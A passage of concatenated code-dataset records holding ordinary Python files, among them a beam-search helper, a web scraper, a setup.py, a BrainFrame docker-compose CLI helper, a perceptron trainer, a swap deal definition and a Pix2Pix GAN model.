Nested structure (tensor, list, tuple or dict) containing tensors\n with shape [batch_size, beam_size, ...].\n beam_indices: int32 tensor with shape [batch_size, new_beam_size]. Each\n value in beam_indices must be in [0, beam_size), and values are not\n necessarily unique.\n batch_size: int size of batch\n new_beam_size: int number of beams to be pulled from the nested tensors.\n\n Returns:\n Nested structure containing tensors with shape\n [batch_size, new_beam_size, ...]\n \"\"\"\n batch_pos = tf.range(batch_size * new_beam_size) // new_beam_size\n batch_pos = tf.reshape(batch_pos, [batch_size, new_beam_size])\n coordinates = tf.stack([batch_pos, beam_indices], axis=2)\n return nest.map_structure(lambda state: tf.gather_nd(state, coordinates), nested)\n\n\ndef _gather_topk_beams(nested, score_or_log_prob, batch_size, beam_size):\n \"\"\"Gather top beams from nested structure.\"\"\"\n _, topk_indexes = tf.nn.top_k(score_or_log_prob, k=beam_size)\n return _gather_beams(nested, topk_indexes, batch_size, beam_size)","sub_path":"pycfiles/todl-0.1.1.tar/beam_search_v1.cpython-37.py","file_name":"beam_search_v1.cpython-37.py","file_ext":"py","file_size_in_byte":22371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
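To make the beam-gathering coordinate trick in the record above concrete, here is a small self-contained NumPy sketch; NumPy fancy indexing stands in for `tf.gather_nd`, and all shapes and values are illustrative:

```python
import numpy as np

batch_size, beam_size, new_beam_size = 2, 3, 2
# fake per-beam state: shape [batch_size, beam_size, seq_len]
state = np.arange(batch_size * beam_size * 4).reshape(batch_size, beam_size, 4)

beam_indices = np.array([[2, 0],   # batch 0 keeps beams 2 and 0
                         [1, 1]])  # batch 1 keeps beam 1 twice

# same construction as _gather_beams: pair a batch index with each beam index
batch_pos = np.arange(batch_size * new_beam_size) // new_beam_size
batch_pos = batch_pos.reshape(batch_size, new_beam_size)

gathered = state[batch_pos, beam_indices]  # plays the role of tf.gather_nd
assert gathered.shape == (batch_size, new_beam_size, 4)
```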
+{"seq_id":"378449128","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 19 20:56:23 2018\n\n@author: isaac\n\"\"\"\nimport numpy as np\nimport pickle\nimport os\nimport time\n\n\npath = r\"C:\\Users\\isaac\\Documents\\GitHub\\100-Days-of-ML-Code\\moods\"\nos.chdir(path)\nprint(\"Opening pickle file\")\nwith open(\"vectorizedsentences.txt\",'rb') as fp:\n x = pickle.load(fp)\n\nprint(\"Flattening matrices into a single array...\")\n\n#@vectorize(['float32(float32,float32)'], target = 'gpu')\ndef matricer(x):\n formatted_x = []\n i=1\n for matrix in x:\n print(\"Converting matrix \",i,\" out of \",len(x))\n i+=1\n \n for vector in matrix:\n try:\n \n for entry in vector:\n \n formatted_x.append(entry)\n #print(\"Conversion success.\")\n except TypeError:\n #print(\"Error passed\")\n pass\n time.sleep(0.01)\n# longm.append(longv)\n vector_of_all = np.array(formatted_x).reshape([-1,300,300,1])\n print(\"Done\")\n\n np.save(\"vectored_data.npy\",vector_of_all)\n print(\"File saved.\")\n return vector_of_all\nms = matricer(x)\nprint(ms.shape)","sub_path":"dataMatricer.py","file_name":"dataMatricer.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"204420675","text":"import requests\nfrom bs4 import BeautifulSoup\n\nURL_AUTOMOVEIS = 'https://django-anuncios.solyd.com.br/automoveis/'\n\n\ndef buscar(url):\n try:\n resposta = requests.get(url)\n if resposta.status_code == 200:\n return resposta.text\n else:\n print('Error making the request!!')\n except Exception as error:\n print('Error making the request!!')\n print(error)\n\n\ndef parsing(resposta_html):\n try:\n soup = BeautifulSoup(resposta_html, 'html.parser')\n return soup\n except Exception as error:\n print('Error parsing the HTML!')\n print(error)\n\n\ndef encontrar_links(soup):\n cards_pai = soup.find('div', class_=\"ui three doubling link cards\")\n cards = cards_pai.find_all('a')\n links = []\n for card in cards:\n link = card['href']\n links.append(link)\n\n return links\n\n\nresposta = buscar(URL_AUTOMOVEIS)\nif resposta:\n soup = parsing(resposta)\n if soup:\n links = encontrar_links(soup)\n print(links)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"236677045","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport re\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n# reading pymlconf version (same way sqlalchemy does)\nwith open(os.path.join(os.path.dirname(__file__), 'pymlconf', '__init__.py')) as v_file:\n package_version = re.compile(r\".*__version__ = '(.*?)'\", re.S).match(v_file.read()).group(1)\n\ndependencies = ['pyyaml >= 3.10']\n\n# checking for current python version to add legacy `ordereddict` module into dependencies\nif sys.version_info < (2, 7):\n dependencies.append('ordereddict')\n\n\ndef read(filename):\n return open(os.path.join(os.path.dirname(__file__), filename)).read()\n\nsetup(\n name=\"pymlconf\",\n version=package_version,\n author=\"Vahid Mardani\",\n author_email=\"vahid.mardani@gmail.com\",\n url=\"http://github.com/pylover/pymlconf\",\n description=\"Python high level configuration library\",\n maintainer=\"Vahid Mardani\",\n maintainer_email=\"vahid.mardani@gmail.com\",\n packages=[\"pymlconf\", \"pymlconf.tests\"],\n package_dir={'pymlconf': 'pymlconf'},\n package_data={'pymlconf': ['tests/conf/*', 'tests/files/*']},\n platforms=[\"any\"],\n long_description=read('README.rst'),\n install_requires=dependencies,\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: MIT License\",\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Software Development :: Libraries'\n ],\n test_suite='pymlconf.tests',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
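As an aside, the `__version__`-sniffing regex used in the setup.py record above can be exercised on a made-up `__init__.py` body; the file contents below are invented purely for illustration:

```python
import re

fake_init = "# pymlconf\n__version__ = '1.2.3'\n"
# same pattern as the record above: DOTALL so .* spans lines, lazy group for the version
version = re.compile(r".*__version__ = '(.*?)'", re.S).match(fake_init).group(1)
assert version == '1.2.3'
```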
+{"seq_id":"373039131","text":"import os\nimport subprocess\nfrom pathlib import Path\nfrom typing import List, TextIO, Tuple, cast\n\nimport i18n\nimport yaml\n\nfrom . import env_vars, os_utils, print_utils\n\n# The URL to the docker-compose.yml\nBRAINFRAME_DOCKER_COMPOSE_URL = \"https://{subdomain}aotu.ai/releases/brainframe/{version}/docker-compose.yml\"\n# The URL to the latest tag, which is just a file containing the latest version\n# as a string\nBRAINFRAME_LATEST_TAG_URL = (\n \"https://{subdomain}aotu.ai/releases/brainframe/latest\"\n)\n\n\ndef assert_installed(install_path: Path) -> None:\n compose_path = install_path / \"docker-compose.yml\"\n\n if not compose_path.is_file():\n print_utils.fail_translate(\n \"general.brainframe-must-be-installed\",\n install_env_var=env_vars.install_path.name,\n )\n\n\ndef run(install_path: Path, commands: List[str]) -> None:\n _assert_has_docker_permissions()\n\n compose_path = install_path / \"docker-compose.yml\"\n\n full_command = [\"docker-compose\", \"--file\", str(compose_path)]\n\n # Provide the override file if it exists\n compose_override_path = install_path / \"docker-compose.override.yml\"\n if compose_override_path.is_file():\n full_command += [\"--file\", str(compose_override_path)]\n\n # Provide the .env file if it exists\n env_path = install_path / \".env\"\n if env_path.is_file():\n full_command += [\"--env-file\", str(env_path)]\n\n os_utils.run(full_command + commands)\n\n\ndef download(target: Path, version: str = \"latest\") -> None:\n _assert_has_write_permissions(target.parent)\n\n subdomain, auth_flags, version = check_download_version(version=version)\n\n url = BRAINFRAME_DOCKER_COMPOSE_URL.format(\n subdomain=subdomain, version=version\n )\n os_utils.run(\n [\"curl\", \"-o\", str(target), \"--fail\", \"--location\", url] + auth_flags,\n )\n\n if os_utils.is_root():\n # Fix the permissions of the docker-compose.yml so that the BrainFrame\n # group can edit it\n os_utils.give_brainframe_group_rw_access([target])\n\n\ndef check_download_version(\n version: str = \"latest\",\n) -> Tuple[str, List[str], str]:\n subdomain = \"\"\n auth_flags = []\n\n # Add the flags to authenticate with staging if the user wants to download\n # from there\n if env_vars.is_staging.is_set():\n subdomain = \"staging.\"\n\n username = env_vars.staging_username.get()\n password = env_vars.staging_password.get()\n if username is None or password is None:\n print_utils.fail_translate(\n \"general.staging-missing-credentials\",\n username_env_var=env_vars.staging_username.name,\n password_env_var=env_vars.staging_password.name,\n )\n\n auth_flags = [\"--user\", f\"{username}:{password}\"]\n\n if version == \"latest\":\n # Check what the latest version is\n url = BRAINFRAME_LATEST_TAG_URL.format(subdomain=subdomain)\n result = os_utils.run(\n [\"curl\", \"--fail\", \"-s\", \"--location\", url] + auth_flags,\n print_command=False,\n stdout=subprocess.PIPE,\n encoding=\"utf-8\",\n )\n # stdout is a file-like object opened in text mode when the encoding\n # argument is \"utf-8\"\n stdout = cast(TextIO, result.stdout)\n version = stdout.readline().strip()\n\n return subdomain, auth_flags, version\n\n\ndef check_existing_version(install_path: Path) -> str:\n compose_path = install_path / \"docker-compose.yml\"\n compose = yaml.load(compose_path.read_text(), Loader=yaml.SafeLoader)\n version = compose[\"services\"][\"core\"][\"image\"].split(\":\")[-1]\n version = \"v\" + version\n return version\n\n\ndef _assert_has_docker_permissions() -> None:\n 
\"\"\"Fails if the user does not have permissions to interact with Docker\"\"\"\n if not (os_utils.is_root() or os_utils.currently_in_group(\"docker\")):\n error_message = (\n i18n.t(\"general.docker-bad-permissions\")\n + \"\\n\"\n + _group_recommendation_message(\"docker\")\n )\n\n print_utils.fail(error_message)\n\n\ndef _assert_has_write_permissions(path: Path) -> None:\n \"\"\"Fails if the user does not have write access to the given path.\"\"\"\n if os.access(path, os.W_OK):\n return\n\n error_message = i18n.t(\"general.file-bad-write-permissions\", path=path)\n error_message += \"\\n\"\n\n if path.stat().st_gid == os_utils.BRAINFRAME_GROUP_ID:\n error_message += \" \" + _group_recommendation_message(\"brainframe\")\n else:\n error_message += \" \" + i18n.t(\n \"general.unexpected-group-for-file\", path=path, group=\"brainframe\"\n )\n\n print_utils.fail(error_message)\n\n\ndef _group_recommendation_message(group: str) -> str:\n if os_utils.added_to_group(\"brainframe\"):\n # The user is in the group, they just need to restart\n return i18n.t(\"general.restart-for-group-access\", group=group)\n else:\n # The user is not in the group, so they need to either add\n # themselves or use sudo\n return i18n.t(\"general.retry-as-root-or-group\", group=group)\n","sub_path":"brainframe/cli/docker_compose.py","file_name":"docker_compose.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
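For reference, `check_existing_version` in the record above boils down to reading the tag off the core service's image. A minimal sketch against an inline compose snippet (the image name here is invented):

```python
import yaml

compose_text = """
services:
  core:
    image: example/brainframe-core:0.29.0
"""
compose = yaml.load(compose_text, Loader=yaml.SafeLoader)
# take everything after the last colon as the tag, then prefix with "v"
version = "v" + compose["services"]["core"]["image"].split(":")[-1]
assert version == "v0.29.0"
```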
+{"seq_id":"466955232","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom Perceptron import Perceptron\n\ndata = np.genfromtxt('sonar.all-data.txt', delimiter=',')\nnp.random.shuffle(data)\n\ninputs = data[:, 0:60]\ntargets = data[:, 60]\n\nn_inputs = 60\np1 = Perceptron(n_inputs)\nalfa = 0.005\n\nN = 200\nE = np.zeros(N)\nfor i in range(N):\n p1.error_train_epoch(inputs, targets, alfa)\n E[i] = p1.error_value(inputs, targets)\n print(E[i])\n\nplt.plot(E)\nplt.ylabel('E')\nplt.xlabel('epochs')\nplt.show()\n","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
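The `Perceptron` class itself is not included in this record. As a rough, hypothetical sketch of the error-driven update that an `error_train_epoch` call presumably performs (the function name, signature, and details here are assumptions, not the real API):

```python
import numpy as np

def error_train_epoch(w, b, inputs, targets, alfa):
    # one pass over the data with the classic perceptron update rule
    for x, t in zip(inputs, targets):
        y = 1.0 if np.dot(w, x) + b > 0 else 0.0
        w += alfa * (t - y) * x   # nudge the boundary toward misclassified points
        b += alfa * (t - y)
    return w, b

rng = np.random.default_rng(0)
X = rng.normal(size=(10, 60))                       # stand-in for the sonar features
t = rng.integers(0, 2, size=10).astype(float)       # stand-in for the labels
w, b = error_train_epoch(np.zeros(60), 0.0, X, t, alfa=0.005)
```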
+{"seq_id":"132795888","text":"import acm\nfrom DealDevKit import DealDefinition, Settings, NoOverride\nfrom CompositeAttributesLib import CashFlowInstrumentDefinition, InstrumentPropertiesDefinition, InstrumentIDDefinition, LegDefinition, CashFlowDefinition, TradeDefinition, TradeBODefinition, AddInfoDefinition, InstrumentRegulatoryInfoDefinition, TradeIDDefinition, TradeRegulatoryInfoDefinition\nfrom DealSTI import DealSTI\n \n@DealSTI('TotalReturnSwap') \n@Settings(SheetDefaultColumns=['Multi Leg Label', 'Portfolio Present Value', 'Fixed Rate', 'Par Rate', 'Float Spread', 'Par Spread', 'Portfolio Delta Yield']) \nclass TotalReturnSwapDefinition(DealDefinition):\n\n ins = CashFlowInstrumentDefinition( instrument=\"Instrument\" )\n \n insProperties = InstrumentPropertiesDefinition( instrument=\"Instrument\" )\n \n insID = InstrumentIDDefinition( instrument=\"Instrument\")\n\n tradeID = TradeIDDefinition( trade=\"Trade\")\n\n insRegulatoryInfo = InstrumentRegulatoryInfoDefinition(insRegInfo=\"InstrumentRegulatoryInfo\")\n\n payLeg = LegDefinition( leg='PayLeg', trade='Trade' )\n \n recLeg = LegDefinition( leg='ReceiveLeg', trade='Trade' )\n \n payCashFlows = CashFlowDefinition( leg='PayLeg', trade='Trade')\n \n recCashFlows = CashFlowDefinition( leg='ReceiveLeg', trade='Trade')\n \n trade = TradeDefinition( trade='Trade', showBuySell=False )\n \n tradeBackOffice = TradeBODefinition ( trade='Trade' )\n \n insAddInfo = AddInfoDefinition( obj='Instrument' )\n \n tradeAddInfo = AddInfoDefinition( obj='Trade' )\n \n tradeRegulatoryInfo = TradeRegulatoryInfoDefinition(tradeRegInfo=\"TradeRegulatoryInfo\")\n\n # Attribute overrides\n def AttributeOverrides(self, overrideAccumulator):\n overrideAccumulator(\n {\n 'ins_currency': dict(onChanged='@OnInstrumentCurrencyChanged'),\n 'ins_discountingType': dict(visible='@DiscountingTypeVisible'),\n 'ins_dividendFactor': dict(label='Div Factor',\n visible='@DividendFactorVisible'),\n 'ins_quotation': dict(onChanged='@OnQuotationChanged',\n visible='@IsShowModeInstrumentDetail'),\n 'ins_settlementType': dict(label='Settlement'),\n 'insProperties_spotBankingDaysOffset': dict(onChanged='@OnInstrumentSpotDaysChanged'),\n 'payLeg_calculationPeriodDateRule': dict(visible='@RollOffsetVisible'),\n 'payLeg_currency': dict(label='',\n width=9),\n 'payLeg_dayCountMethod': dict(visible='@DayCountVisible'),\n 'payLeg_initialRate': dict(label='Initial Price',\n visible='@InitialPriceVisible',\n maxWidth=500),\n 'recLeg_calculationPeriodDateRule': dict(visible='@RollOffsetVisible'),\n 'recLeg_currency': dict(label='',\n width=9),\n 'recLeg_dayCountMethod': dict(visible='@DayCountVisible'),\n 'recLeg_initialRate': dict(label='Initial Price',\n visible='@InitialPriceVisible',\n maxWidth=500),\n 'recLeg_priceInterpretationType': dict(visible='@PriceInterpretationTypeVisible'),\n 'trade_premium': dict(visible=True),\n 'trade_price': dict(visible=True),\n 'trade_salesCoverViceVersaPrice': dict(visible=False),\n 'trade_suggestDiscountingType': dict(visible='@DiscountingTypeVisible'),\n }\n ) \n\n # Visible Callbacks\n def DiscountingTypeVisible(self, attributeName):\n return self.IsShowModeDetail() or self.Instrument().DiscountingType()\n \n def DayCountVisible(self, attributeName):\n if attributeName == 'payLeg_dayCountMethod':\n return self.IsShowModeDetail() or self.PayLeg().LegType() != 'Total Return'\n if attributeName == 'recLeg_dayCountMethod':\n return self.IsShowModeDetail() or self.ReceiveLeg().LegType() != 'Total Return'\n \n def DividendFactorVisible(self, 
attributeName):\n for leg in self.Instrument().Legs():\n if leg.LegType()=='Total Return' and leg.FloatRateReference():\n if leg.FloatRateReference().InsType() != 'Bond':\n return self.IsShowModeDetail()\n return False\n\n def InitialPriceVisible(self, attributeName):\n if attributeName == 'payLeg_initialRate':\n return self.PayLeg().LegType() == 'Total Return'\n if attributeName == 'recLeg_initialRate':\n return self.ReceiveLeg().LegType() == 'Total Return'\n \n def PriceInterpretationTypeVisible(self, attributeName):\n for leg in self.Instrument().Legs():\n if leg.LegType()=='Total Return' and leg.FloatRateReference():\n if leg.FloatRateReference().InsType() not in ['Stock', 'EquityIndex']:\n return self.IsShowModeDetail()\n return False\n \n def RollOffsetVisible(self, attributeName):\n if attributeName == 'payLeg_calculationPeriodDateRule':\n if self.PayLeg().LegType() != 'Total Return' and self.ReceiveLeg().LegType() == 'Total Return':\n return NoOverride\n if attributeName == 'recLeg_calculationPeriodDateRule':\n if self.ReceiveLeg().LegType() != 'Total Return' and self.PayLeg().LegType() == 'Total Return':\n return NoOverride\n \n \n # Util\n def InstrumentPanes(self):\n return 'CustomPanes_TotalReturnSwap'\n \n def TradePanes(self):\n return 'CustomPanes_TotalReturnSwapTrade'\n \n \ndef UpdateDefaultInstrument(ins):\n insDeco = acm.FBusinessLogicDecorator.WrapObject(ins)\n insDeco.UpdateLegFixedRateOrSpread()\n","sub_path":"Extensions/Deal Definitions/FPythonCode/TotalReturnSwap_DP.py","file_name":"TotalReturnSwap_DP.py","file_ext":"py","file_size_in_byte":6245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"12414271","text":"from collections import OrderedDict\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport os\nimport functools\n\n\n# Pix2Pix model class [256 based]\nclass Pix2PixModel():\n def __init__(self, ckpt_dir, model_name,\n is_train=True, n_epochs=100, \n n_epochs_decay=100):\n super(Pix2PixModel, self).__init__()\n self.isTrain = is_train\n # self.training = self.isTrain\n self.save_dir = ckpt_dir\n self.loss_names = ['G_GAN', 'G_L1', 'D_real', 'D_fake']\n self.visual_names = ['real_A', 'fake_B', 'real_B']\n if self.isTrain:\n self.model_names = ['G', 'D']\n else:\n self.model_names = ['G']\n self.optimizers = []\n self.epoch_count = 1\n self.n_epochs = n_epochs\n self.n_epochs_decay = n_epochs_decay\n \n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)\n # Define the Generator\n self.netG = Generator(3, 3, 8, ngf=64, norm_layer=norm_layer, use_dropout=False)\n self.netG = init_net(self.netG)\n\n # Define the Discriminator if training\n if self.isTrain:\n self.criterionLoss = nn.L1Loss()\n #self.netD = Discriminator(6, ndf=64, n_layers=3, norm_layer=norm_layer)\n self.netD = Discriminator(6)\n self.netD = init_net(self.netD)\n \n if self.isTrain:\n self.criterionGAN = GANLoss().to(self.device)\n self.criterionL1 = nn.L1Loss()\n self.optimizer_G = optim.Adam(self.netG.parameters(), lr=0.0002, betas=(0.5, 0.999))\n self.optimizer_D = optim.Adam(self.netD.parameters(), lr=0.0002, betas=(0.5, 0.999))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n \n def set_input(self, input):\n self.real_A = input['A'].to(self.device)\n self.real_B = input['B'].to(self.device)\n self.image_paths = input['A_paths']\n \n def forward(self):\n self.fake_B = self.netG(self.real_A)\n \n def backward_D(self):\n fake_AB = torch.cat((self.real_A, self.fake_B), 1)\n pred_fake = self.netD(fake_AB.detach())\n self.loss_D_fake = self.criterionGAN(pred_fake, False)\n \n real_AB = torch.cat((self.real_A, self.real_B), 1)\n pred_real = self.netD(real_AB)\n self.loss_D_real = self.criterionGAN(pred_real, True)\n\n self.loss_D = (self.loss_D_fake + self.loss_D_real) * 0.5\n self.loss_D.backward()\n \n def backward_G(self):\n fake_AB = torch.cat((self.real_A, self.fake_B), 1)\n pred_fake = self.netD(fake_AB)\n self.loss_G_GAN = self.criterionGAN(pred_fake, True)\n\n self.loss_G_L1 = self.criterionL1(self.fake_B, self.real_B) * 100.0\n\n self.loss_G = self.loss_G_GAN + self.loss_G_L1\n self.loss_G.backward()\n \n def set_requires_grad(self, nets, requires_grad=False):\n if not isinstance(nets, list):\n nets = [nets]\n for net in nets:\n if net is not None:\n for param in net.parameters():\n param.requires_grad = requires_grad\n\n def optimize_parameters(self):\n self.forward()\n\n self.set_requires_grad(self.netD, True)\n self.optimizer_D.zero_grad()\n self.backward_D()\n self.optimizer_D.step()\n\n self.set_requires_grad(self.netD, False)\n self.optimizer_G.zero_grad()\n self.backward_G()\n self.optimizer_G.step()\n \n def get_scheduler(self, optimizer):\n def lambda_rule(epoch):\n lr_l = 1.0 - max(0, epoch + self.epoch_count - self.n_epochs) / float(self.n_epochs_decay + 1)\n return lr_l\n scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_rule)\n return scheduler\n\n def setup(self):\n if self.isTrain:\n self.schedulers = 
[self.get_scheduler(optimizer) for optimizer in self.optimizers]\n \n self.print_networks()\n \n def eval(self):\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net' + name)\n net.eval()\n\n def test(self):\n with torch.no_grad():\n self.forward()\n\n def get_image_paths(self):\n return self.image_paths\n\n def update_learning_rate(self):\n for scheduler in self.schedulers:\n scheduler.step()\n\n def get_current_visuals(self):\n visual_ret = OrderedDict()\n for name in self.visual_names:\n if isinstance(name, str):\n visual_ret[name] = getattr(self, name)\n return visual_ret\n\n def get_current_losses(self):\n errors_ret = OrderedDict()\n for name in self.loss_names:\n if isinstance(name, str):\n errors_ret[name] = float(getattr(self, 'loss_' + name))\n return errors_ret\n\n def save_network(self, epoch):\n for name in self.model_names:\n if isinstance(name, str):\n save_filename = '%s_net_%s.pth' % (epoch, name)\n save_path = os.path.join(self.save_dir, save_filename)\n net = getattr(self, 'net' + name)\n\n torch.save(net.cpu().state_dict(), save_path)\n net.to(self.device)\n \n def __patch_instance_norm_state_dict(self, state_dict, module, keys, i=0):\n key = keys[i]\n if i + 1 == len(keys):\n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'running_mean' or key == 'running_var'):\n if getattr(module, key) is None:\n state_dict.pop('.'.join(keys))\n \n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'num_batches_tracked'):  # drop stale buffers from older checkpoints\n state_dict.pop('.'.join(keys))\n else:\n self.__patch_instance_norm_state_dict(state_dict, getattr(module, key), keys, i + 1)\n\n def load_networks(self, epoch):\n for name in self.model_names:\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net' + name)\n if isinstance(net, nn.DataParallel):\n net = net.module\n print('Loading the model from %s' % load_path)\n\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n \n for key in list(state_dict.keys()):\n self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)\n\n def print_networks(self):\n print('---------- Networks initialized -------------')\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net' + name)\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print('[Network %s] Total number of parameters : %.3f M' % (name, num_params / 1e6))\n \n # def train(self, is_training):\n # pass\n \nclass UnetBlock(nn.Module):\n def __init__(self, outer_nc, inner_nc, input_nc=None,\n submodule=None, outermost=False, innermost=False,\n norm_layer=nn.BatchNorm2d, use_dropout=False):\n super(UnetBlock, self).__init__()\n self.outermost = outermost\n if type(norm_layer) == functools.partial:\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n if input_nc is None:\n input_nc = outer_nc\n \n downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,\n stride=2, padding=1, bias=use_bias)\n downrelu = nn.LeakyReLU(0.2, True)\n downnorm = norm_layer(inner_nc)\n\n uprelu = nn.ReLU(True)\n upnorm = norm_layer(outer_nc)\n\n if outermost:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n \n down = [downconv]\n up = [uprelu, upconv, nn.Tanh()]\n 
model = down + [submodule] + up\n \n elif innermost:\n upconv = nn.ConvTranspose2d(inner_nc, outer_nc, kernel_size=4,\n stride=2, padding=1, bias=use_bias)\n \n down = [downrelu, downconv]\n up = [uprelu, upconv, upnorm]\n model = down + up\n \n else:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1, bias=use_bias)\n\n down = [downrelu, downconv, downnorm]\n up = [uprelu, upconv, upnorm]\n \n if use_dropout:\n model = down + [submodule] + up + [nn.Dropout(0.5)]\n else:\n model = down + [submodule] + up\n \n self.model = nn.Sequential(*model)\n \n def forward(self, x):\n if self.outermost:\n return self.model(x)\n else:\n return torch.cat([x, self.model(x)], 1)\n\nclass Generator(nn.Module):\n def __init__(self, input_nc, output_nc, num_downs, ngf=64,\n norm_layer=nn.BatchNorm2d, use_dropout=False):\n super(Generator, self).__init__()\n unet_block = UnetBlock(ngf * 8, ngf * 8, input_nc=None,\n submodule=None, norm_layer=norm_layer,\n innermost=True)\n \n for i in range(num_downs - 5):\n unet_block = UnetBlock(ngf * 8, ngf * 8, input_nc=None, \n submodule=unet_block, norm_layer=norm_layer,\n use_dropout=use_dropout)\n \n unet_block = UnetBlock(ngf * 4, ngf * 8, input_nc=None,\n submodule=unet_block, norm_layer=norm_layer)\n \n unet_block = UnetBlock(ngf * 2, ngf * 4, input_nc=None,\n submodule=unet_block, norm_layer=norm_layer)\n \n unet_block = UnetBlock(ngf, ngf * 2, input_nc=None,\n submodule=unet_block, norm_layer=norm_layer)\n\n self.model = UnetBlock(output_nc, ngf, input_nc=input_nc, \n submodule=unet_block, \n outermost=True, norm_layer=norm_layer)\n \n\n def forward(self, input):\n return self.model(input)\n\nclass Discriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(Discriminator, self).__init__()\n if type(norm_layer) == functools.partial:\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n \n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), \n nn.LeakyReLU(0.2, True)]\n \n nf_mult = 1\n nf_mult_prev = 1\n \n for n in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n\n sequence += [nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)  # use n_layers here, not the loop variable\n\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1,\n padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]\n self.model = nn.Sequential(*sequence)\n \n def forward(self, input):\n return self.model(input)\n\nclass GANLoss(nn.Module):\n def __init__(self, target_real_label=1.0, target_fake_label=0.0):\n super(GANLoss, self).__init__()\n self.register_buffer('real_label', torch.tensor(target_real_label))\n self.register_buffer('fake_label', torch.tensor(target_fake_label))\n\n self.gan_mode = 'vanilla'\n self.loss = nn.BCEWithLogitsLoss()\n \n def get_target_tensor(self, prediction, target_is_real):\n if target_is_real:\n target_tensor = self.real_label\n else:\n target_tensor = self.fake_label\n return target_tensor.expand_as(prediction)\n \n def __call__(self, prediction, target_is_real):\n target_tensor = self.get_target_tensor(prediction, target_is_real)\n loss = self.loss(prediction, 
target_tensor)\n\n return loss\n\ndef init_net(net):\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n net.to(device)\n\n def init_weights(m):\n classname = m.__class__.__name__\n if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n if hasattr(m, 'bias') and m.bias is not None:\n nn.init.constant_(m.bias.data, 0.0)\n\n elif classname.find('BatchNorm2d') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0.0)\n \n net.apply(init_weights)\n return net\n","sub_path":"Pix2Pix_Project/pix2pix_helpers/pix2pix_model.py","file_name":"pix2pix_model.py","file_ext":"py","file_size_in_byte":14029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
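A quick smoke-test sketch for the networks defined in the record above, assuming the classes in that file are importable; with `num_downs=8` the U-Net halves the spatial size eight times, so inputs should be 256x256:

```python
import torch

G = init_net(Generator(3, 3, 8))
D = init_net(Discriminator(6))

# keep the dummy input on the same device init_net moved the model to
x = torch.randn(1, 3, 256, 256).to(next(G.parameters()).device)
fake = G(x)                                # -> (1, 3, 256, 256)
score = D(torch.cat([x, fake], dim=1))     # PatchGAN-style score map, (1, 1, 30, 30)
print(fake.shape, score.shape)
```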
